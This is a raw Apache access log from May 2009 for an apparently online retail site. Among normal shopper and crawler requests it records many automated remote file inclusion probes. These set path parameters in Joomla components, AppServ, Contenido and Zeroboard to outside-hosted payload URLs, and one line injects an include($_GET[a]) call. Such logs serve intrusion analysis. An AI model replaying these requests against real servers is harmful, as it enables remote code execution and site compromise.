123.143.98.5 - - [25/May/2009:04:14:37 -0400] "GET /?_zb_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
203.130.231.111 - - [25/May/2009:04:14:37 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:14:39 -0400] "GET /logs/access_log.Q108091400//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:14:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
77.222.40.40 - - [25/May/2009:04:14:48 -0400] "GET /logs/access_log.Q108091400//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.125.64.49 - - [25/May/2009:04:14:52 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.33.197.126 - - [25/May/2009:04:14:56 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG HTTP/1.1" 200 59133 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:15:01 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
77.222.40.40 - - [25/May/2009:04:15:10 -0400] "GET /logs/access_log.Q108091400//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:04:15:12 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:04:15:12 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:04:15:13 -0400] "GET /logs/access_log.Q108090100/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:15 -0400] "GET /appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:15 -0400] "GET /logs/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:15 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:19 -0400] "GET /appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:19 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:19 -0400] "GET /logs/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:20 -0400] "GET /appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:20 -0400] "GET /logs/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:20 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:20 -0400] "GET /appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:20 -0400] "GET /logs/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:15:20 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:15:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG HTTP/1.1" 200 59525 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
77.222.40.40 - - [25/May/2009:04:15:27 -0400] "GET /logs/access_log.Q108091400//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:15:27 -0400] "GET /images/items/9600027_THUMB.JPG HTTP/1.1" 200 2613 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
216.176.196.171 - - [25/May/2009:04:15:36 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:04:15:36 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:04:15:36 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:04:15:37 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:04:15:38 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:04:15:38 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
212.33.197.126 - - [25/May/2009:04:15:48 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
77.222.40.40 - - [25/May/2009:04:15:54 -0400] "GET /logs/access_log.Q109051000//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
216.176.196.171 - - [25/May/2009:04:15:55 -0400] "GET /logs/access_log.Q109022800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:04:15:56 -0400] "GET /logs/access_log.Q109022800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
77.222.40.40 - - [25/May/2009:04:15:59 -0400] "GET /logs/access_log.Q109051000//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:16:05 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG HTTP/1.1" 200 59018 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:16:09 -0400] "GET /images/items/0800010_THUMB.JPG HTTP/1.1" 200 2749 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:16:10 -0400] "GET /images/items/0800052_THUMB.JPG HTTP/1.1" 200 2161 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:16:10 -0400] "GET /images/items/0800059_THUMB.JPG HTTP/1.1" 200 24955 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:16:10 -0400] "GET /images/items/0800011_THUMB.JPG HTTP/1.1" 200 1283 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
77.222.40.40 - - [25/May/2009:04:16:12 -0400] "GET /logs/access_log.Q109051000//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.125.64.51 - - [25/May/2009:04:16:16 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
58.227.193.198 - - [25/May/2009:04:16:24 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:16:33 -0400] "GET /logs/access_log.Q108091400//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:16:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG HTTP/1.1" 200 50136 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:16:40 -0400] "GET /images/items/9700014_THUMB.JPG HTTP/1.1" 200 1620 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
87.106.7.58 - - [25/May/2009:04:16:42 -0400] "GET /appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:16:42 -0400] "GET /logs/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:16:42 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:16:50 -0400] "GET /logs/access_log.Q109051000//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:16:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:16:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG HTTP/1.1" 200 59299 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
87.106.7.58 - - [25/May/2009:04:17:06 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:17:06 -0400] "GET /logs/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:17:06 -0400] "GET /appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:04:17:11 -0400] "GET /logs/access_log.Q108081600%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:04:17:17 -0400] "GET /logs/access_log.Q108090100%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:17:17 -0400] "GET /logs/access_log.Q109051000//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:04:17:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.242.189.186 - - [25/May/2009:04:17:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA)"
218.242.189.186 - - [25/May/2009:04:17:18 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA)"
58.227.193.198 - - [25/May/2009:04:17:19 -0400] "GET /logs/error_log.Q108072600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.242.189.186 - - [25/May/2009:04:17:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA)"
218.242.189.186 - - [25/May/2009:04:17:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA)"
212.33.197.126 - - [25/May/2009:04:17:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG HTTP/1.1" 200 59290 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
216.246.124.211 - - [25/May/2009:04:17:54 -0400] "GET /logs/access_log.Q108081600%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
216.176.196.171 - - [25/May/2009:04:17:57 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:04:18:00 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
216.246.124.211 - - [25/May/2009:04:18:01 -0400] "GET /logs/access_log.Q108090100%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:18:05 -0400] "GET /logs/access_log.Q109050700/?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:18:05 -0400] "GET /logs/?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:18:05 -0400] "GET /?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:18:06 -0400] "GET /appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:18:06 -0400] "GET /logs/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:18:06 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.175.122.228 - - [25/May/2009:04:18:33 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.175.122.228 - - [25/May/2009:04:18:33 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.175.122.228 - - [25/May/2009:04:18:33 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:04:19:00 -0400] "GET /?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:04:19:00 -0400] "GET /logs/?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:04:19:00 -0400] "GET /logs/access_log.Q109050700/?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.30.142.171 - - [25/May/2009:04:19:07 -0400] "GET /logs/access_log.Q108072300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.222.40.40 - - [25/May/2009:04:19:17 -0400] "GET /logs/access_log.Q109050700%20%20/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:19:18 -0400] "GET /logs/access_log.Q109050700%20%20/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:19:18 -0400] "GET /logs/access_log.Q109050700%20%20/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:19:22 -0400] "GET /logs/access_log.Q109050700%20%20/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:20:16 -0400] "GET /logs/access_log.Q109050700%20%20/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:20:23 -0400] "GET /logs/access_log.Q109050700%20%20/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.175.122.228 - - [25/May/2009:04:20:35 -0400] "GET /logs/error_log.Q108080800/config.php?path_to_root=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:20:56 -0400] "GET /logs/access_log.Q109050700%20%20/appserv/main.php?appserv_root=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:04:21:13 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:04:21:18 -0400] "GET /logs/access_log.Q108091400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:04:21:32 -0400] "GET /logs/access_log.Q109050700%20%20/?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:04:21:57 -0400] "GET /logs/access_log.Q109050900%20%20/?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:04:22:00 -0400] "GET /logs/show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:04:22:00 -0400] "GET /show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:04:22:00 -0400] "GET /logs/access_log.Q109051100/show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
86.39.131.85 - - [25/May/2009:04:22:05 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:22:13 -0400] "GET /logs/access_log.Q109050700%20%20/?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:04:22:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.246.124.211 - - [25/May/2009:04:22:21 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:04:22:25 -0400] "GET /logs/access_log.Q108091400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:23:01 -0400] "GET /logs/access_log.Q109050900%20%20/?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:23:16 -0400] "GET /logs/?_zb_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:23:16 -0400] "GET /?_zb_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
66.175.122.228 - - [25/May/2009:04:23:40 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:23:45 -0400] "GET /?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:23:45 -0400] "GET /logs/?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:23:45 -0400] "GET /logs/access_log.Q109051100%20%20/?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:24:05 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:24:12 -0400] "GET /logs/access_log.Q108072800%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.175.122.228 - - [25/May/2009:04:24:15 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:24:20 -0400] "GET /?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:24:20 -0400] "GET /logs/access_log.Q109051100%20%20/?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:24:20 -0400] "GET /logs/?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:25:30 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:25:34 -0400] "GET /logs/access_log.Q108072800%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
195.34.78.110 - - [25/May/2009:04:25:35 -0400] "GET //linkadmin.php?page=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [25/May/2009:04:25:42 -0400] "GET /logs//linkadmin.php?page=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
